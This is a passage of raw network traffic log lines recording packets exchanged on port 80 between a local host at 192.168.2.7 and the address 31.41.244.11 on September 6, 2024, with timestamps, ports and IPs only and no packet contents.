Sep 6, 2024 09:58:10.034720898 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034725904 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034734964 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034759998 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034763098 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034765959 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034778118 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.034801006 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.034823895 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035335064 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035341978 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035362959 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035379887 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035387039 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035392046 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035401106 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035412073 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035417080 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035429001 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035429955 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035434961 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035459995 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035475016 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035511971 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035517931 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035537958 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035546064 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035558939 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035561085 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035564899 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035589933 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035619020 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035790920 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035857916 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035902977 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.035954952 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035962105 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035969019 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035974026 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.035998106 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036003113 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036010981 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036016941 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036020994 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036021948 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036027908 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036040068 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036062956 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036076069 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036118984 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036124945 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036135912 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036142111 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036148071 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036168098 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036207914 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036216974 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036222935 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036227942 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036233902 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036258936 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036288977 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036294937 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036300898 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036312103 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036315918 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036344051 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036365986 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036463976 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036469936 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036475897 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036488056 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036513090 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036514997 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036541939 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036546946 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036551952 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036562920 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036566973 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036592960 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036617994 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036623001 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036674023 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036686897 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036705971 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036720991 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036726952 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036727905 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036751032 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036766052 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036772013 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036776066 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036777020 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.036797047 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.036822081 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.037230015 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037285089 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.037336111 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037342072 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037353992 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037359953 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037364960 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037370920 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037384987 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037386894 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.037421942 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.037441015 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.037504911 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.037553072 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.071965933 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.071986914 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.072000027 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.072006941 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.072012901 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.072019100 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.072033882 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.072038889 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.072063923 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.072120905 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.082861900 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082896948 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082905054 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082918882 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082926035 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082931995 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082937956 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082950115 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082956076 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.082971096 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.083012104 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.083061934 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083067894 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083081007 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083087921 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083097935 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083108902 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083115101 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083121061 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.083121061 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083128929 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083144903 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.083146095 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083162069 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.083184958 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083189964 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.083190918 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083214045 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.083223104 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083228111 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.083244085 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.083278894 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.120693922 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120701075 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120711088 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120716095 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120722055 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120728970 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120745897 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120752096 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120789051 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.120848894 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.120979071 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120985031 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.120995998 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121037960 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121038914 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.121043921 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121056080 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121061087 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121085882 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.121102095 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.121229887 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121237040 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121242046 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121253014 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121258974 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121268988 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.121314049 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121320009 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121329069 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121342897 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.121365070 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.121495008 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121582985 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121588945 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121608019 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121614933 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121620893 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121628046 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.121648073 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.121678114 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122152090 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122159004 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122164965 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122169971 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122176886 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122188091 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122193098 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122199059 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122212887 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122240067 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122404099 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122410059 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122416019 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122421026 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122426033 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122431993 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122438908 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122451067 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122479916 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122596025 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122602940 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122613907 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122653961 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122695923 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122701883 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122714043 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122720003 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122725964 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122741938 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122766018 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122857094 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122876883 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122895956 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122900009 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122901917 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122905016 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122929096 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.122935057 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122941971 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.122952938 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123003006 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123018026 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123023033 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123028994 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123034000 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123039961 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123054028 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123070002 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123075962 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123126984 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123167992 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123231888 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123338938 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123351097 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123363018 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123368025 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123373985 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123379946 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123384953 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123404980 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123406887 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123420954 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123442888 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123570919 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123585939 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123588085 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123613119 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123631001 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.123646021 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123651981 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123663902 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123670101 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.123703003 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.124066114 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.124073029 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.124098063 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.124104023 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.124116898 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.124121904 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.124135971 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.124140024 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.124145031 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.124157906 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.124186993 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.159883022 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.159905910 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.159918070 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.159955978 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.159965992 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.159979105 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.159991980 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.160002947 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.160011053 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.160032988 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.160073996 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171163082 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171180964 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171191931 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171226025 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171271086 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171307087 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171319008 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171333075 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171346903 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171359062 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171360970 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171394110 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171432018 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171479940 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171490908 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171502113 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171530008 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171588898 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171617031 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171629906 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171642065 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171653986 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171658993 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171677113 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171715021 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171786070 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171797991 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171808958 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171833992 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171866894 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.171964884 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171977997 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171989918 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.171998024 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.172020912 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.207452059 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207472086 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207493067 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207509041 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207514048 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.207520962 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207535028 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207546949 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.207546949 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207561016 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207582951 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.207622051 CEST	49721	80	192.168.2.7	31.41.244.11
